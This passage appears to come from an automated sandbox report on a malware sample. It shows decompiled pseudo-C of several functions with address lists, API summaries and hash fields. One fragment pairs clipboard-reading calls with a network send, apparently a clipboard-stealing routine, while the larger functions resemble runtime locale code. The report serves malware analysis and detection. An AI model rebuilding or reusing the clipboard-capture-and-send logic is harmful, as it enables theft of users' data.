				return 0;
			}








                              0x0041272d
                              0x00412733
                              0x00412739
                              0x00412748
                              0x00412756
                              0x00412759
                              0x00412762
                              0x00412768
                              0x00412775
                              0x0041277d
                              0x00412785
                              0x0041278b
                              0x00412790
                              0x00412797
                              0x00412b2a
                              0x00412b2a
                              0x00412748
                              0x00412d65
                              0x00412d71
                              0x00412d7d
                              0x00412d8a

                              APIs
                              • OpenClipboard.USER32 ref: 00412725
                              • EmptyClipboard.USER32 ref: 00412733
                              • CloseClipboard.USER32 ref: 00412739
                              • OpenClipboard.USER32 ref: 00412740
                              • GetClipboardData.USER32 ref: 00412750
                              • GlobalLock.KERNEL32 ref: 00412759
                              • GlobalUnlock.KERNEL32(00000000), ref: 00412762
                              • CloseClipboard.USER32 ref: 00412768
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                              • String ID:
                              • API String ID: 2172192267-0
                              • Opcode ID: b41a75f227100de5b93510063d07bff1ec11f8c1ae7a32dbd0f192b5edc047f4
                              • Instruction ID: 4156f71339dd3ecea6f92ec0e14f94680420b0c666956b6fa8fd4283cc091fe2
                              • Opcode Fuzzy Hash: b41a75f227100de5b93510063d07bff1ec11f8c1ae7a32dbd0f192b5edc047f4
                              • Instruction Fuzzy Hash: 7F0161312043008BC314BF71ED49AAEB7A5AF90743F44457FF906D21A2DF38CA588A5A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00447855, Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                              Download Yara Rule
                              C-Code - Quality: 95%
                              			E00447855(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				char _t92;
				char _t100;
				void* _t101;
				signed int _t104;
				void* _t107;
				void* _t121;
				char* _t123;
				signed int _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				char* _t139;

				_t121 = __edx;
				_t100 = _a4;
				_v28 = _t100;
				_v24 = 0;
				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = L0043DFD9(_t101, 1, 0x50);
					_v8 = _t53;
					if(_t53 != 0) {
						_t104 = 0x14;
						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
						_t132 = E0043E61D(0, 4);
						_t127 = 0;
						_v12 = _t132;
						L0043EE85(0);
						_pop(_t107);
						if(_t132 != 0) {
							 *_t132 = 0;
							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
								_t133 = _v8;
								_t57 =  *0x46a188; // 0x46a180
								 *_t133 = _t57;
								_t58 =  *0x46a18c; // 0x46b64c
								 *((intOrPtr*)(_t133 + 4)) = _t58;
								_t59 =  *0x46a190; // 0x46b64c
								 *((intOrPtr*)(_t133 + 8)) = _t59;
								_t60 =  *0x46a1b8; // 0x46a184
								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
								_t61 =  *0x46a1bc; // 0x46b650
								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
								L19:
								 *_v12 = 1;
								if(_t127 != 0) {
									 *_t127 = 1;
								}
								goto L21;
							}
							_t134 = E0043E61D(_t107, 4);
							_v20 = _t134;
							L0043EE85(0);
							if(_t134 == 0) {
								L11:
								L0043EE85(_v8);
								L0043EE85(_v12);
								return _v16;
							}
							 *_t134 = 0;
							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
							_t135 = E0044A26E(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
							_t136 = _t135 | E0044A26E(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
							_v16 = _v8 + 8;
							_t137 = _t136 | E0044A26E(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
							_t138 = _t137 | E0044A26E(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
							if((E0044A26E(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
								_t123 =  *_v16;
								while( *_t123 != 0) {
									_t92 =  *_t123;
									if(_t92 < 0x30 || _t92 > 0x39) {
										if(_t92 != 0x3b) {
											goto L16;
										}
										_t139 = _t123;
										do {
											 *_t139 =  *((intOrPtr*)(_t139 + 1));
											_t139 = _t139 + 1;
										} while ( *_t139 != 0);
									} else {
										 *_t123 = _t92 - 0x30;
										L16:
										_t123 = _t123 + 1;
									}
								}
								_t127 = _v20;
								_t133 = _v8;
								goto L19;
							}
							E004477EC(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						L0043EE85(_v8);
						return 1;
					}
					return 1;
				} else {
					_t127 = 0;
					_v12 = 0;
					_t133 = 0x46a188;
					L21:
					_t64 =  *(_t100 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							L0043EE85( *((intOrPtr*)(_t100 + 0x7c)));
							L0043EE85( *(_t100 + 0x88));
						}
					}
					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
					 *(_t100 + 0x80) = _t127;
					 *(_t100 + 0x88) = _t133;
					return 0;
				}
			}



































                              0x00447855
                              0x0044785e
                              0x00447865
                              0x00447868
                              0x00447871
                              0x00447890
                              0x00447893
                              0x00447898
                              0x0044789f
                              0x004478b2
                              0x004478b3
                              0x004478bc
                              0x004478be
                              0x004478c1
                              0x004478c4
                              0x004478ca
                              0x004478cd
                              0x004478e0
                              0x004478e8
                              0x00447a42
                              0x00447a45
                              0x00447a4a
                              0x00447a4c
                              0x00447a51
                              0x00447a54
                              0x00447a59
                              0x00447a5c
                              0x00447a61
                              0x00447a64
                              0x00447a69
                              0x004479d2
                              0x004479d8
                              0x004479dc
                              0x004479de
                              0x004479de
                              0x00000000
                              0x004479dc
                              0x004478f5
                              0x004478f8
                              0x004478fb
                              0x00447904
                              0x00447999
                              0x0044799c
                              0x004479a5
                              0x00000000
                              0x004479ae
                              0x0044790d
                              0x00447912
                              0x00447926
                              0x0044793a
                              0x00447946
                              0x00447954
                              0x0044796e
                              0x0044798a
                              0x004479b4
                              0x004479c7
                              0x004479b8
                              0x004479bc
                              0x00447a2f
                              0x00000000
                              0x00000000
                              0x00447a31
                              0x00447a33
                              0x00447a36
                              0x00447a38
                              0x00447a3b
                              0x004479c2
                              0x004479c4
                              0x004479c6
                              0x004479c6
                              0x004479c6
                              0x004479bc
                              0x004479cc
                              0x004479cf
                              0x00000000
                              0x004479cf
                              0x0044798f
                              0x00447994
                              0x00000000
                              0x00447998
                              0x004478d2
                              0x00000000
                              0x004478da
                              0x00000000
                              0x0044787b
                              0x0044787b
                              0x0044787d
                              0x00447880
                              0x004479e0
                              0x004479e0
                              0x004479e8
                              0x004479ea
                              0x004479ea
                              0x004479f2
                              0x004479f7
                              0x004479fb
                              0x00447a00
                              0x00447a0b
                              0x00447a11
                              0x004479fb
                              0x00447a15
                              0x00447a1a
                              0x00447a20
                              0x00000000
                              0x00447a20

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: b3c4254b1914d5676fdef0349b01322d8a8533affb1a52188d7c82f1ea8becb2
                              • Instruction ID: 4a395575b819a6d294d3ee7acebf23b8f9ee550dc3552f8ac4883c6f511beba5
                              • Opcode Fuzzy Hash: b3c4254b1914d5676fdef0349b01322d8a8533affb1a52188d7c82f1ea8becb2
                              • Instruction Fuzzy Hash: 7361F371904205AFEB20DF65C842B9EBBF4EF49710F14016BE954EB381E7749D42CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0043D1E1, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMON
                              Download Yara Rule
                              C-Code - Quality: 73%
                              			E0043D1E1(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				void* _t244;
				signed int _t247;
				signed int _t249;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t261;
				signed int _t263;
				void* _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				intOrPtr _t283;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				signed int _t319;
				signed int _t320;
				signed int _t323;
				signed int _t328;
				void* _t330;
				signed int _t332;
				void* _t333;
				intOrPtr _t334;
				signed int _t339;
				signed int _t340;
				intOrPtr* _t343;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				intOrPtr* _t362;
				signed int _t364;
				signed int _t370;
				intOrPtr* _t374;
				intOrPtr* _t377;
				void* _t380;
				intOrPtr* _t381;
				intOrPtr* _t382;
				signed int _t393;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t399;
				signed int* _t403;
				intOrPtr* _t410;
				intOrPtr* _t411;
				signed int _t421;
				short _t422;
				void* _t424;
				signed int _t425;
				signed int _t427;
				intOrPtr _t428;
				signed int _t431;
				intOrPtr _t432;
				signed int _t434;
				signed int _t437;
				intOrPtr _t443;
				signed int _t444;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t452;
				signed int _t456;
				signed int* _t457;
				intOrPtr* _t458;
				short _t459;
				void* _t461;
				signed int _t463;
				signed int _t465;
				void* _t467;
				void* _t468;
				void* _t470;
				signed int _t471;
				void* _t472;
				void* _t474;
				signed int _t475;
				void* _t477;
				void* _t479;
				intOrPtr _t491;

				_t420 = __edx;
				_t461 = _t467;
				_t468 = _t467 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t357 = E0043E61D(__ecx, 0x6a6);
				_t240 = 0;
				_pop(_t370);
				if(_t357 == 0) {
					L20:
					return _t240;
				} else {
					_push(__edi);
					_t2 = _t357 + 4; // 0x4
					_t427 = _t2;
					 *_t427 = 0;
					 *_t357 = 1;
					_t443 = _a4;
					_t4 = _t443 + 0x30; // 0x43c9e0
					_t241 = _t4;
					_push( *_t241);
					_v16 = _t241;
					_push(0x457488);
					_push( *0x457344);
					E0043D120(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
					_t470 = _t468 + 0x18;
					_v8 = 0x457344;
					while(1) {
						L2:
						_t244 = L00446DB7(_t427, 0x351, ";");
						_t471 = _t470 + 0xc;
						if(_t244 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t410 = _t8;
							_t339 =  *_v16;
							_v16 = _t410;
							_t411 =  *_t410;
							goto L4;
						}
						while(1) {
							L4:
							_t420 =  *_t339;
							if(_t420 !=  *_t411) {
								break;
							}
							if(_t420 == 0) {
								L8:
								_t340 = 0;
							} else {
								_t420 =  *((intOrPtr*)(_t339 + 2));
								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
									break;
								} else {
									_t339 = _t339 + 4;
									_t411 = _t411 + 4;
									if(_t420 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t370 = _v8 + 0xc;
							_v8 = _t370;
							_v12 = _v12 &  !( ~_t340);
							_t343 = _v16;
							_v16 = _t343;
							_push( *_t343);
							_push(0x457488);
							_push( *_t370);
							E0043D120(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
							_t470 = _t471 + 0x18;
							if(_v8 < 0x457374) {
								goto L2;
							} else {
								if(_v12 != 0) {
									L0043EE85(_t357);
									_t31 = _t443 + 0x28; // 0x30ff068b
									_t434 = _t427 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t443 + 0x28; // 0x30ff068b
											L0043EE85( *_t32);
										}
									}
									_t33 = _t443 + 0x24; // 0x30ff0c46
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t434 == 1;
										if(_t434 == 1) {
											_t34 = _t443 + 0x24; // 0x30ff0c46
											L0043EE85( *_t34);
										}
									}
									 *(_t443 + 0x24) = 0;
									 *(_t443 + 0x1c) = 0;
									 *(_t443 + 0x28) = 0;
									 *((intOrPtr*)(_t443 + 0x20)) = 0;
									_t39 = _t443 + 0x40; // 0x10468b00
									_t240 =  *_t39;
								} else {
									_t20 = _t443 + 0x28; // 0x30ff068b
									_t437 = _t427 | 0xffffffff;
									_t491 =  *_t20;
									if(_t491 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t491 == 0) {
											_t21 = _t443 + 0x28; // 0x30ff068b
											L0043EE85( *_t21);
										}
									}
									_t22 = _t443 + 0x24; // 0x30ff0c46
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t437 == 1) {
											_t23 = _t443 + 0x24; // 0x30ff0c46
											L0043EE85( *_t23);
										}
									}
									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
									_t26 = _t357 + 4; // 0x4
									_t240 = _t26;
									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
									 *(_t443 + 0x28) = _t357;
									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
								}
								goto L20;
							}
							goto L130;
						}
						asm("sbb eax, eax");
						_t340 = _t339 | 0x00000001;
						__eflags = _t340;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043629A();
					asm("int3");
					_push(_t461);
					_t463 = _t471;
					_t472 = _t471 - 0x1d0;
					_t247 =  *0x46a00c; // 0x5d382218
					_v56 = _t247 ^ _t463;
					_t249 = _v40;
					_push(_t357);
					_push(_t443);
					_t444 = _v36;
					_push(_t427);
					_t428 = _v44;
					_v508 = _t428;
					__eflags = _t249;
					if(_t249 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t359 = 0;
						_v452 = 0;
						__eflags = _t444;
						if(__eflags == 0) {
							L79:
							E0043D1E1(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
							goto L80;
						} else {
							__eflags =  *_t444 - 0x4c;
							if( *_t444 != 0x4c) {
								L58:
								_push(0);
								_t255 = L0043CDA9(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
								_t474 = _t472 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t370 = 0;
									__eflags = 0;
									_t76 = _t428 + 0x20; // 0x43c9d0
									_t421 = _t76;
									_t446 = 0;
									_v452 = _t421;
									do {
										__eflags = _t446;
										if(_t446 == 0) {
											L73:
											_t256 = _v456;
										} else {
											_t374 =  *_t421;
											_t257 =  &_v276;
											while(1) {
												__eflags =  *_t257 -  *_t374;
												_t428 = _v464;
												if( *_t257 !=  *_t374) {
													break;
												}
												__eflags =  *_t257;
												if( *_t257 == 0) {
													L66:
													_t370 = 0;
													_t258 = 0;
												} else {
													_t422 =  *((intOrPtr*)(_t257 + 2));
													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
													_v458 = _t422;
													_t421 = _v452;
													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
														break;
													} else {
														_t257 = _t257 + 4;
														_t374 = _t374 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L66;
														}
													}
												}
												L68:
												__eflags = _t258;
												if(_t258 == 0) {
													_t359 = _t359 + 1;
													__eflags = _t359;
													goto L73;
												} else {
													_t259 =  &_v276;
													_push(_t259);
													_push(_t446);
													_push(_t428);
													L83();
													_t421 = _v452;
													_t474 = _t474 + 0xc;
													__eflags = _t259;
													if(_t259 == 0) {
														_t370 = 0;
														_t256 = 0;
														_v456 = 0;
													} else {
														_t359 = _t359 + 1;
														_t370 = 0;
														goto L73;
													}
												}
												goto L74;
											}
											asm("sbb eax, eax");
											_t258 = _t257 | 0x00000001;
											_t370 = 0;
											__eflags = 0;
											goto L68;
										}
										L74:
										_t446 = _t446 + 1;
										_t421 = _t421 + 0x10;
										_v452 = _t421;
										__eflags = _t446 - 5;
									} while (_t446 <= 5);
									__eflags = _t256;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t359;
										goto L77;
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t444 + 2) - 0x43;
								if( *(_t444 + 2) != 0x43) {
									goto L58;
								} else {
									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
									if( *((short*)(_t444 + 4)) != 0x5f) {
										goto L58;
									} else {
										while(1) {
											_t261 = L00447F17(_t444, 0x457480);
											_t361 = _t261;
											_v472 = _t361;
											_pop(_t376);
											__eflags = _t361;
											if(_t361 == 0) {
												break;
											}
											_t263 = _t261 - _t444;
											__eflags = _t263;
											_v456 = _t263 >> 1;
											if(_t263 == 0) {
												break;
											} else {
												_t265 = 0x3b;
												__eflags =  *_t361 - _t265;
												if( *_t361 == _t265) {
													break;
												} else {
													_t431 = _v456;
													_t362 = 0x457344;
													_v460 = 1;
													do {
														_t266 = L00447EDD( *_t362, _t444, _t431);
														_t472 = _t472 + 0xc;
														__eflags = _t266;
														if(_t266 != 0) {
															goto L45;
														} else {
															_t377 =  *_t362;
															_t420 = _t377 + 2;
															do {
																_t334 =  *_t377;
																_t377 = _t377 + 2;
																__eflags = _t334 - _v468;
															} while (_t334 != _v468);
															_t376 = _t377 - _t420 >> 1;
															__eflags = _t431 - _t377 - _t420 >> 1;
															if(_t431 != _t377 - _t420 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v460 = _v460 + 1;
														_t362 = _t362 + 0xc;
														__eflags = _t362 - 0x457374;
													} while (_t362 <= 0x457374);
													_t359 = _v472 + 2;
													_t267 = L00447E8D(_t376, _t359, ";");
													_t428 = _v464;
													_t447 = _t267;
													_pop(_t380);
													__eflags = _t447;
													if(_t447 != 0) {
														L48:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t268 = _v452;
															goto L54;
														} else {
															_push(_t447);
															_t270 = L00446EF9(_t380,  &_v276, 0x83, _t359);
															_t475 = _t472 + 0x10;
															__eflags = _t270;
															if(_t270 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E0043629A();
																asm("int3");
																_push(_t463);
																_t465 = _t475;
																_t273 =  *0x46a00c; // 0x5d382218
																_v556 = _t273 ^ _t465;
																_push(_t359);
																_t364 = _v540;
																_push(_t447);
																_push(_t428);
																_t432 = _v544;
																_v1292 = _t364;
																_v1276 = E00440972(_t364, _t380, _t420) + 0x278;
																_push( &_v1256);
																_t280 = L0043CDA9(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
																_t477 = _t475 - 0x2e4 + 0x18;
																__eflags = _t280;
																if(_t280 != 0) {
																	_t101 = _t364 + 2; // 0x6
																	_t450 = _t101 << 4;
																	__eflags = _t450;
																	_t281 =  &_v280;
																	_v724 = _t450;
																	_t381 =  *((intOrPtr*)(_t450 + _t432));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t281 -  *_t381;
																		_t452 = _v724;
																		if( *_t281 !=  *_t381) {
																			break;
																		}
																		__eflags =  *_t281;
																		if( *_t281 == 0) {
																			L91:
																			_t282 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t281 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
																			_v718 = _t459;
																			_t452 = _v724;
																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
																				break;
																			} else {
																				_t281 = _t281 + 4;
																				_t381 = _t381 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t282;
																		if(_t282 != 0) {
																			_t382 =  &_v280;
																			_t424 = _t382 + 2;
																			do {
																				_t283 =  *_t382;
																				_t382 = _t382 + 2;
																				__eflags = _t283 - _v712;
																			} while (_t283 != _v712);
																			_v728 = (_t382 - _t424 >> 1) + 1;
																			_t286 = E0043E61D(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
																			_v740 = _t286;
																			__eflags = _t286;
																			if(_t286 == 0) {
																				goto L84;
																			} else {
																				_v732 =  *((intOrPtr*)(_t452 + _t432));
																				_t125 = _t364 * 4; // 0xb86e
																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
																				_t128 = _t432 + 8; // 0x8b56ff8b
																				_v748 =  *_t128;
																				_t391 =  &_v280;
																				_v720 = _t286 + 4;
																				_t290 = E00440264(_t286 + 4, _v728,  &_v280);
																				_t479 = _t477 + 0xc;
																				__eflags = _t290;
																				if(_t290 != 0) {
																					_t291 = _v712;
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					E0043629A();
																					asm("int3");
																					return  *0x46b508;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
																					if(_v280 != 0x43) {
																						L102:
																						_t296 = L0043CAB6(_t364, _t391, _t432,  &_v708);
																						_t393 = _v712;
																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t393 = _v712;
																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
																						}
																					}
																					__eflags = _t364 - 2;
																					if(_t364 != 2) {
																						__eflags = _t364 - 1;
																						if(_t364 != 1) {
																							__eflags = _t364 - 5;
																							if(_t364 == 5) {
																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
																						}
																					} else {
																						_t457 = _v736;
																						_t425 = _t393;
																						_t403 = _t457;
																						 *(_t432 + 8) = _v716;
																						_v720 = _t457;
																						_v728 = _t457[8];
																						_v716 = _t457[9];
																						while(1) {
																							_t154 = _t432 + 8; // 0x8b56ff8b
																							__eflags =  *_t154 -  *_t403;
																							if( *_t154 ==  *_t403) {
																								break;
																							}
																							_t458 = _v720;
																							_t425 = _t425 + 1;
																							_t328 =  *_t403;
																							 *_t458 = _v728;
																							_v716 = _t403[1];
																							_t403 = _t458 + 8;
																							 *((intOrPtr*)(_t458 + 4)) = _v716;
																							_t364 = _v752;
																							_t457 = _v736;
																							_v728 = _t328;
																							_v720 = _t403;
																							__eflags = _t425 - 5;
																							if(_t425 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t425 - 5;
																							if(__eflags == 0) {
																								_t178 = _t432 + 8; // 0x8b56ff8b
																								_t319 = L00447F5C(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x457400, 0x7f,  &_v536,  *_t178, 1);
																								_t479 = _t479 + 0x1c;
																								__eflags = _t319;
																								_t320 = _v712;
																								if(_t319 == 0) {
																									_t457[1] = _t320;
																								} else {
																									do {
																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t323 = E004330D1( &_v536,  *0x46a170, 0xfe);
																									_t479 = _t479 + 0xc;
																									__eflags = _t323;
																									_t457[1] = 0 | _t323 == 0x00000000;
																								}
																								_t193 = _t432 + 8; // 0x8b56ff8b
																								 *_t457 =  *_t193;
																							}
																							 *(_t432 + 0x18) = _t457[1];
																							goto L121;
																						}
																						__eflags = _t425;
																						if(_t425 != 0) {
																							 *_t457 =  *(_t457 + _t425 * 8);
																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
																							 *(_t457 + _t425 * 8) = _v728;
																							 *(_t457 + 4 + _t425 * 8) = _v716;
																						}
																						goto L110;
																					}
																					L121:
																					_t297 = _t364 * 0xc;
																					_t200 = _t297 + 0x457340; // 0x40e12c
																					 *0x45346c(_t432);
																					_t299 =  *((intOrPtr*)( *_t200))();
																					_t396 = _v732;
																					__eflags = _t299;
																					if(_t299 == 0) {
																						__eflags = _t396 - 0x46a2a8;
																						if(_t396 != 0x46a2a8) {
																							_t456 = _t364 + _t364;
																							__eflags = _t456;
																							asm("lock xadd [eax], ecx");
																							if(_t456 != 0) {
																								goto L126;
																							} else {
																								_t218 = _t456 * 8; // 0x30ff068b
																								L0043EE85( *((intOrPtr*)(_t432 + _t218 + 0x28)));
																								_t221 = _t456 * 8; // 0x30ff0c46
																								L0043EE85( *((intOrPtr*)(_t432 + _t221 + 0x24)));
																								_t224 = _t364 * 4; // 0xb86e
																								L0043EE85( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
																								_t399 = _v712;
																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
																							}
																						}
																						_t397 = _v740;
																						 *_t397 = 1;
																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
																					} else {
																						 *(_v724 + _t432) = _t396;
																						_t205 = _t364 * 4; // 0xb86e
																						L0043EE85( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
																						L0043EE85(_v740);
																						 *(_t432 + 8) = _v748;
																						goto L84;
																					}
																					goto L85;
																				}
																			}
																		} else {
																			goto L85;
																		}
																		goto L130;
																	}
																	asm("sbb eax, eax");
																	_t282 = _t281 | 0x00000001;
																	__eflags = _t282;
																	goto L93;
																} else {
																	L84:
																	__eflags = 0;
																	L85:
																	__eflags = _v16 ^ _t465;
																	return E0042F61B(_v16 ^ _t465);
																}
															} else {
																_t330 = _t447 + _t447;
																__eflags = _t330 - 0x106;
																if(_t330 >= 0x106) {
																	E0042F74F();
																	goto L82;
																} else {
																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
																	_t332 =  &_v276;
																	_push(_t332);
																	_push(_v460);
																	_push(_t428);
																	L83();
																	_t472 = _t475 + 0xc;
																	__eflags = _t332;
																	_t268 = _v452;
																	if(_t332 != 0) {
																		_t268 = _t268 + 1;
																		_v452 = _t268;
																	}
																	L54:
																	_t444 = _t359 + _t447 * 2;
																	_t370 = 0;
																	__eflags =  *_t444;
																	if( *_t444 == 0) {
																		L56:
																		__eflags = _t268;
																		L77:
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																		}
																		goto L80;
																	} else {
																		_t444 = _t444 + 2;
																		__eflags =  *_t444;
																		if( *_t444 != 0) {
																			continue;
																		} else {
																			goto L56;
																		}
																	}
																}
															}
														}
													} else {
														_t333 = 0x3b;
														__eflags =  *_t359 - _t333;
														if( *_t359 != _t333) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L130;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t444;
						if(_t444 != 0) {
							_push(_t444);
							_push(_t249);
							_push(_t428);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t463;
						return E0042F61B(_v12 ^ _t463);
					}
				}
				L130:
			}





































































































































                              0x0043d1e1
                              0x0043d1e4
                              0x0043d1e6
                              0x0043d1e9
                              0x0043d1ea
                              0x0043d1f3
                              0x0043d1fb
                              0x0043d1fd
                              0x0043d1ff
                              0x0043d202
                              0x0043d31b
                              0x0043d320
                              0x0043d208
                              0x0043d208
                              0x0043d209
                              0x0043d209
                              0x0043d20c
                              0x0043d20f
                              0x0043d211
                              0x0043d214
                              0x0043d214
                              0x0043d217
                              0x0043d219
                              0x0043d21c
                              0x0043d221
                              0x0043d22f
                              0x0043d239
                              0x0043d23c
                              0x0043d23f
                              0x0043d23f
                              0x0043d24a
                              0x0043d24f
                              0x0043d254
                              0x00000000
                              0x0043d25a
                              0x0043d25d
                              0x0043d25d
                              0x0043d260
                              0x0043d262
                              0x0043d265
                              0x0043d265
                              0x0043d265
                              0x0043d267
                              0x0043d267
                              0x0043d267
                              0x0043d26d
                              0x00000000
                              0x00000000
                              0x0043d272
                              0x0043d289
                              0x0043d289
                              0x0043d274
                              0x0043d274
                              0x0043d27c
